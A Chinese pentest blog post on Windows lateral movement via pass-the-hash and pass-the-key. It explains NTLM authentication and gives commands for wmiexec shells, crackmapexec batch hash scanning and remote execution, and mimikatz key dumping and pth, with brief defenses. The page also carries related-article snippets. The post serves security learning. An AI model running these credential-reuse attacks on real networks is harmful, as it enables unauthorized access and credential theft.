windows内网渗透PTH/PTK攻击

已于 2022-04-04 19:29:48 修改
阅读量6.1k 收藏 20
点赞数 4
分类专栏: 渗透测试 文章标签: 安全 安全漏洞
于 2020-07-18 16:53:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/107423721
版权

前言

windows内网渗透中,有三种最常用的pass系列攻击:

  • pass the hash(hash传递攻击,简称pth)
  • pass the ticket(票据传递攻击,简称ptt)
  • pass the key(密钥传递攻击,简称ptk)

1.1 pass the hash攻击

适用情况:

  • 本地账号:默认只有管理员组内账号可以pth
  • 域账号:默认均可pth

1.1.1 NTLM HASH

windows用户hash主要由以下部分组成,其中NTLM-HASH比LM-HASH的安全性要更高:

用户名称:RID:LM-HASH值:NTLM-HASH值

自Windows Vista和Windows Server 2008开始,Windows取消LM hash。另外,如果用户密码长度大于15,也无法生成LM hash。

1.1.2 NTLM网络认证机制

NTLM是一种基于质询/应答 (Challenge/Response )消息交换模式的认证机制,常用于工作组和域环境下身份认证
NTLM认证过程有三步:
协商:主要用于确认双方协议版本(NTLMv1、NTLMv2等)
质询:质询/应答 (Challenge/Response)模式,用于消息交换
验证:验证身份合法性,通常由 Server端或 DC完成这个过程
大致流程如下:

  • 客户端对密码进行哈希处理并缓存密码 hash,丢弃实际的明文密码(不存储),然后将用户名发送到服务器,发起认证请求
  • 服务器生成一个 16字节的随机数,称为质询发送给客户端
  • 客户端使用用户密码Hash 对此质询进行加密,将结果发送给服务器
  • 服务器发送三项数据给域控制器(DC):
  1. User name
  2. 发送给客户端的质询
  3. 从客户端接收到的加密结果
  • 域控制器使用 User name从 AD中检索该用户密码的 NTLM Hash,并使用此 NTLM Hash来加密该质询,然后把这个值和客户端计算的响应值加密结果进行比较。如果它们相同,则验证成功

以上步骤中,用户的登录密码 Hash 即为 NTLM Hash,经过NTLM Hash加密的结果在网络协议中称之为 Net NTLM Hash

1.1.3 使用wmiexec拿shell

  • wmiexec.exe地址:https://github.com/maaaaz/impacket-examples-windows/blob/master/wmiexec.exe
  • wmiexec.py地址:https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
    windows下使用wmiexec.exe通过pth方式拿shell:
    wmiexec.exe -hashes 00000000000000000000000000000000:9c1xxxxxxxxxxxxxxxxxxxxfxxxxx8ea0 ./Administrator@192.168.xx.xx
    在这里插入图片描述
    此处是通过Administrator用户的NTLM HASH传递攻击拿shell,登录的域为.代表本地域

1.1.4 使用crackmapexec批量扫描

crackmapexec是一个可以对多个目标机进行批量PTH扫描,且支持命令执行等功能,工具地址:https://github.com/byt3bl33d3r/CrackMapExec
批量扫描命令: /usr/local/python3/bin/crackmapexec --timeout 3 smb target ip.txt -u Administrator -H 9c1xxxxxxxxxxxxxxxxxxxxfxxxxx8ea0 -d .
在这里插入图片描述
命令执行:/usr/local/python3/bin/crackmapexec smb target 192.168.xx.xx -u Administrator -H 9c1xxxxxxxxxxxxxxxxxxxxfxxxxx8ea0 -d . -x ipconfig
在这里插入图片描述

1.2 pass the key攻击

ptk是在域中攻击kerberos认证的一种方式,原理是通过获取用户的aes hmac,通过kerberos认证,可在NTLM认证被禁止的情况下用来实现类似pth的功能。

  1. 使用mimikatz "privilege::debug" "sekurlsa::ekeys"命令获取aes的hmac
    在这里插入图片描述
  2. 使用mimi进行测试:sekurlsa::pth /user:xxx /domain:xxx /aes256:xxxxxxxx"
    在这里插入图片描述
  3. 在弹出的cmd窗口中输入net use命令进行测试
    在这里插入图片描述
  4. wmiexec和crackmapexec同样支持该种方式攻击,可以自行尝试

防御措施

  1. windows安装kb2871997补丁
  2. 使用Kerberos认证代替NTLM认证
  3. 开启PAC(Privileged Attribute Certificate)特权属性证书保护功能
ATpiu
关注
  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 725
WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证KB2871997:禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
PTH攻击总结
systemino的博客
05-26 2564
搞过内网渗透的,你肯定听过pth攻击。这种攻击效果非常显著,微软也是因此在存储凭证方面做了很大的改变。但即使是不断的更新,发布补丁,pth攻击还是存在。今天我们就来一探究竟。 目录 ·pth攻击回顾 ·微软更新 ·hash和NTLM介绍 ·Pth攻击原理 ·Zeros取代LM hash ·实际中的配置 ·pth攻击 ·Mimikatz ·SMB pth攻击 · msf scanner/smb/smb_login · Empire lateral_moveme...
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2730
pth(pass-the-hash)哈希传递攻击内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码域/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
CrackMapExec 域渗透工具使用(超级详细)
最新发布
KKleeeaa的博客
06-25 680
前言最近接触到了这款CrackMapExec 域渗透工具,目前使用感觉是挺不错了,在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。一、CrackMapExec 是什么?CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。二、简单使用1、获取帮助信息可以看到支持使用哪些协议通过使用指定的协议可以获取进一步的帮助信息。
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTHPTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
GFPGANv1.4.pth
04-30
GFPGANv1.4.pth下载
EasyOCR训练好的模型(包含english-g2.pth、zh-sim-g2.pth、craft-mlt-25k.pth
04-03
要调用EasyOCR,不仅需要通过pip install easyocr -i https://pypi.tuna.tsinghua.edu.cn/simple 安装库,还需要通过官网(https://www.jaided.ai/easyocr/modelhub/)下载训练好的pth模型文件。 具体使用文件方法见...
faceparsing_79999_iter.pth
09-30
faceparsing_79999_iter.pth,人脸分割faceparsing的预训练模型,PyTorch版本。
PTH和NPTH有何区别
01-20
PTH是沉铜孔(Plating Through Hole),孔壁有铜,一般是过电孔(VIA)及元件孔。  NPTH是非沉铜孔(Non Plating Through Hole),孔壁无铜,一般是定位孔及锣丝孔。可用干膜封孔或在电镀前胶粒塞或电镀后二次钻孔或...
PTK密钥传递攻击
Y22Lee的博客
05-24 684
PTK(Pass The key),中文叫密钥传递攻击PTH传递中,使用的是NTLM-HASH值,PTK使用AES256或者AES128的方式进行传递,PTK 攻击只能用于kerberos认证中,NTLM认证中没有!Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4251
域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
浅谈PTH
weixin_47731659的博客
10-08 2091
   内网渗透阶段,攻击者利用MSF获取meterpreter或者CS获取bacon之后,首先就是要获取凭证或NTLM hash值。然而获取到Hash值然后破解hash难度很高,难以利用,故诞生了PTH,即获取了目标机器用户的NTLM Hash的情况下,可无需破解哈希直接使用目标的NTLM Hash来完成身份验证。从红队的视角来看,PTH攻击(哈希传递攻击)只是windows横向渗透的开始。下面仅谈谈PTH的相关原理。 一:windows 密码凭证    windows系统使用两种方法对用户输入的密码进行加
Windows系统近年漏洞概况及攻击教程防御
qq_55163354的博客
08-05 3524
参考:《2018年Windows平台漏洞年度报告》 什么是漏洞? 漏洞是在硬软件,协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。例如OpenSSL心脏出血漏洞,Badlock Bug,Stagefright等。 漏洞危害: 从小方面来讲,漏洞曝光后被不法使用会危害个人用户的隐私安全与财产安全。从大方面来讲,一些漏洞就是在网络方面的战略武器。(所以有自己国家的设备系统,芯片等真的很重要。国外有很多先例,我们可以作参考,但核心的东西必须自己有) 具体
哈希传递攻击(Pass-the-Hash,PtH)
谢公子的博客
01-11 5207
目录 哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...
内网安全PTH PTK PTT
qq_61553520的博客
01-28 1537
​​​​​​​。
域渗透利用WIMC进行PTH攻击
Longwaer
01-20 912
学习掌握windows自带WIMC,更好的在内网环境中进行信息收集等操作。
内网安全-域横向PTH&PTK&PTT哈希票据传递
xhscxj的博客
03-14 1087
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 案例 1-域横向移动 PTH 传递-mimikatz PTH ntlm 传递 未打补丁下的工作组及域连接: sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值